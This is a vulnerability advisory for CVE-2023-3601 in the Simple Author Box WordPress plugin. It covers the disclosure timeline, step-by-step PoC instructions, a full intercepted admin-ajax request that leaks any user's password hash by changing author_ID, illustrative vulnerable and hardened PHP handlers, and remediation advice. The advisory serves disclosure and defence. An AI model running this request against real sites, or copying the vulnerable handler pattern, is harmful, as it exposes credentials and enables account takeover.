We have discovered a severe security vulnerability in the Simple Author Box WordPress plugin (CVE-2023-3601, affecting versions up to and including 2.51) which puts the user accounts of affected WordPress sites at high risk of compromise. The vulnerability allows any authenticated attacker with Contributor-level access or higher to read sensitive information about arbitrary users, including their password hashes.
Main info:
| Field | Value |
|---|---|
| CVE | CVE-2023-3601 |
| Plugin | Simple Author Box |
| Criticality | Very High |
| Publicly Published | July 24, 2023 |
| Last Updated | July 24, 2023 |
| Researcher | Dmitrii Ignatyev |
| OWASP TOP-10 | A01:2021-Broken Access Control |
| PoC | Yes |
| Exploit | Will be published later |
| Reference | https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-3601 ; https://wpscan.com/vulnerability/c0cc513e-c306-4920-9afb-e33d95a7292f |
Timeline
| Date | Event |
|---|---|
| July 5, 2023 | Plugin testing and vulnerability detection in the Simple Author Box plugin were completed |
| July 6, 2023 | I contacted the plugin author and provided a vulnerability PoC with a description and recommendations for fixing it |
| July 16, 2023 | The author fixed the vulnerability and released a patched version of the plugin |
| July 24, 2023 | CVE registered |
Discovery of the Vulnerability
During a thorough security assessment, I identified a critical security flaw in the Simple Author Box plugin for WordPress (CVE-2023-3601), affecting versions up to and including 2.51. The flaw is an Insecure Direct Object Reference (IDOR) in the plugin's AJAX code: the handler for the `sab_get_author` admin-ajax action accepts an arbitrary `author_ID` parameter, performs no authorization check on which user record the caller may read, and returns the complete user record. The result is unauthorized disclosure of sensitive user details to any logged-in user who can reach the handler.
Understanding Insecure Direct Object Reference (IDOR)
Insecure Direct Object Reference is a type of security vulnerability where an application exposes direct references to internal objects, such as files, database records, or resources, without proper access controls. Attackers can manipulate these exposed references (often through changing parameters or input values) to access unauthorized data or functionalities.
Exploiting the IDOR Vulnerability
In the context of the Simple Author Box vulnerability, the plugin does not check whether the requesting user is authorized to see the requested user record before returning it, and it returns far more than an author box needs. By changing the `author_ID` parameter in the request, an authenticated attacker with Contributor-level permissions or higher can retrieve the full record of any other user, including the hashed password (CVE-2023-3601).
POC:
1. Create a new Post as a Contributor user.
2. Add the “Simple Author Box” block.
3. Intercept the request to `/wp-admin/admin-ajax.php` that is sent when the block is added. Change the `author_ID` parameter to the ID of a user of your choosing (user ID 1 is normally the account created at installation, i.e. the first administrator).
4. Inspect the response to see all of the information about that user, including the hashed password.
POC request:
```http
POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1
Host: your_site_here
User-Agent: Mozilla/5.0 (X11; Linux aarch64; rv:102.0) Gecko/20100101 Firefox/102.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://your_site_here/wordpress/wp-admin/post-new.php
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 50
Origin: http://your_site_here
Connection: close
Cookie: thc_time=1693728697; wordpress_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C144c7182810741c5eae1d56f1a732319616b45d658a97cb2467966f1a9fa19de; wp-settings-1=libraryContent%3Dbrowse%26siteorigin_panels_setting_tab%3Dwelcome%26hidetb%3D0; wp-settings-time-1=1691260835; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_5bd7a9c61cda6e66fc921a05bc80ee93=forgen%7C1692348426%7CFaI19J1rkJx6EeKHpIVBTdyfmoDfF0Q1s0mnqWNHRUy%7C65dd803dab6a195a6d2c2ff57c23361a622ab5130f1dd3da09ae9076153598ec
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin

action=sab_get_author&author_ID={here_you_can_put_number_from_0_to_9999}&nonce=bc05e90fd7
```

The `Cookie` and `nonce` values are those of the logged-in Contributor session that issued the intercepted request; the nonce is tied to that session and must be taken from the captured request, not guessed. The nonce only proves the request came from the editor page (CSRF protection); it does not restrict which `author_ID` may be requested. `Content-Length: 50` matches a single-digit `author_ID`; if the body length changes, update the header (an intercepting proxy such as Burp Repeater does this automatically).
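To show why the request above leaks a password hash and what a correct handler looks like, here is an added illustration of the two handler patterns in WordPress PHP. This is not the plugin's own code, neither the vulnerable nor the patched version: the hook names, function names, the nonce action name `sab_get_author` and the capability chosen are assumptions made for the example. The vulnerable pattern is what produces the observed behaviour: `get_userdata()` returns a `WP_User` object whose public `$data` property holds every column of the `wp_users` table, so serialising the object with `wp_send_json()` emits `user_pass`, `user_email` and `user_login` for whatever ID the caller supplied.

```php
<?php
/*
 * Added illustration for CVE-2023-3601 (not the Simple Author Box code).
 * Hook names, function names, nonce action and capability are assumed.
 */

// VULNERABLE PATTERN: trusts author_ID, checks no capability, and serialises
// the whole WP_User object. WP_User::$data is public and contains user_pass
// (the password hash), user_email and user_login, so all of it reaches the
// caller as JSON.
add_action( 'wp_ajax_sab_get_author_vulnerable', 'sab_example_get_author_vulnerable' );
function sab_example_get_author_vulnerable() {
    $author_id = isset( $_POST['author_ID'] ) ? (int) $_POST['author_ID'] : 0;
    $user      = get_userdata( $author_id );
    wp_send_json( $user ); // emits {"data":{"user_login":...,"user_pass":...,...},...}
}

// HARDENED PATTERN: nonce, capability check, input validation, and, most
// importantly, a fixed allow-list of public fields instead of the WP_User object.
add_action( 'wp_ajax_sab_get_author_hardened', 'sab_example_get_author_hardened' );
function sab_example_get_author_hardened() {
    // 1. Nonce: proves the request originated from the editor screen (CSRF).
    //    check_ajax_referer() terminates the request with -1 on failure.
    check_ajax_referer( 'sab_get_author', 'nonce' );

    // 2. Authorisation: the caller must at least be allowed to use the editor.
    //    Contributors have edit_posts, so this alone would NOT have stopped the
    //    attack described on this page; it only excludes Subscribers and
    //    unauthenticated callers (wp_ajax_* is never reachable anonymously anyway).
    if ( ! current_user_can( 'edit_posts' ) ) {
        wp_send_json_error( array( 'message' => 'forbidden' ), 403 );
    }

    // 3. Input validation: author_ID must be a positive integer.
    $author_id = isset( $_POST['author_ID'] ) ? absint( $_POST['author_ID'] ) : 0;
    if ( 0 === $author_id ) {
        wp_send_json_error( array( 'message' => 'invalid author_ID' ), 400 );
    }

    $user = get_userdata( $author_id );
    if ( ! $user instanceof WP_User ) {
        wp_send_json_error( array( 'message' => 'no such user' ), 404 );
    }

    // 4. Output filtering: return only what an author box renders. Never pass
    //    the WP_User object or its $data property to a JSON encoder.
    $payload = array(
        'ID'           => $user->ID,
        'display_name' => $user->display_name,
        'description'  => get_the_author_meta( 'description', $user->ID ),
        'avatar'       => get_avatar_url( $user->ID ),
        'url'          => get_author_posts_url( $user->ID ),
    );
    wp_send_json_success( $payload );
}
```

The point of step 4 is that the data requested here (an author's display name, bio and avatar) is public on every post page anyway, so the defect is not that a Contributor could ask about another user, but that the answer contained the private columns of the user record. A capability check is still worth adding, but the fix that closes CVE-2023-3601 is the allow-list of returned fields. When auditing other plugins for the same bug class, search for `wp_send_json` / `json_encode` calls whose argument is a `WP_User`, a `get_userdata()` or `get_user_by()` result, or `$user->data`.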
Potential Risks and Real-World Impact
The IDOR vulnerability in the Simple Author Box plugin introduces severe risks to both website administrators and users. The potential real-world impact includes:
- Unauthorized Data Exposure: Attackers can view and collect the full user record of any account on the site, leading to privacy violations and potential misuse of user data.
- Credential Compromise: Disclosure of password hashes enables offline cracking, which is feasible for weak or reused passwords and can give the attacker access to administrator accounts on the site and to any other service where the same password is reused.
- Identity Impersonation: The leaked information can facilitate identity theft or social engineering attacks, compromising the integrity of user accounts and potentially damaging the reputation of the website.
Recommendations for Improved Security
To mitigate the risks associated with this vulnerability and enhance overall security, the following measures are strongly advised:
- Immediate Plugin Update: The plugin author has released a fixed version (the flaw affects versions up to and including 2.51). Website administrators should update to a patched version promptly; until then, the only mitigation is to restrict or remove accounts with Contributor or higher privileges that are not trusted.
- Security Best Practices: Plugin developers should adhere to secure coding practices, including input validation, proper access controls (a capability check on every AJAX handler), and returning only the fields a feature actually needs rather than whole user objects.
- Regular Security Audits: Conduct regular security assessments and penetration tests on WordPress installations to identify and remediate potential vulnerabilities proactively.
- User Privilege Restriction: Implement strict access controls so that users can only access information they are authorized to view based on their roles and permissions.
- User Awareness: Educate website administrators and users about the risks of sharing sensitive information and the importance of strong, unique passwords; a leaked hash of a strong, unique password is far less useful to an attacker.
By addressing the IDOR vulnerability in the Simple Author Box plugin and following these security recommendations, website owners can significantly reduce the likelihood of security breaches and protect the privacy and integrity of their users’ data.
Dmitrii Ignatyev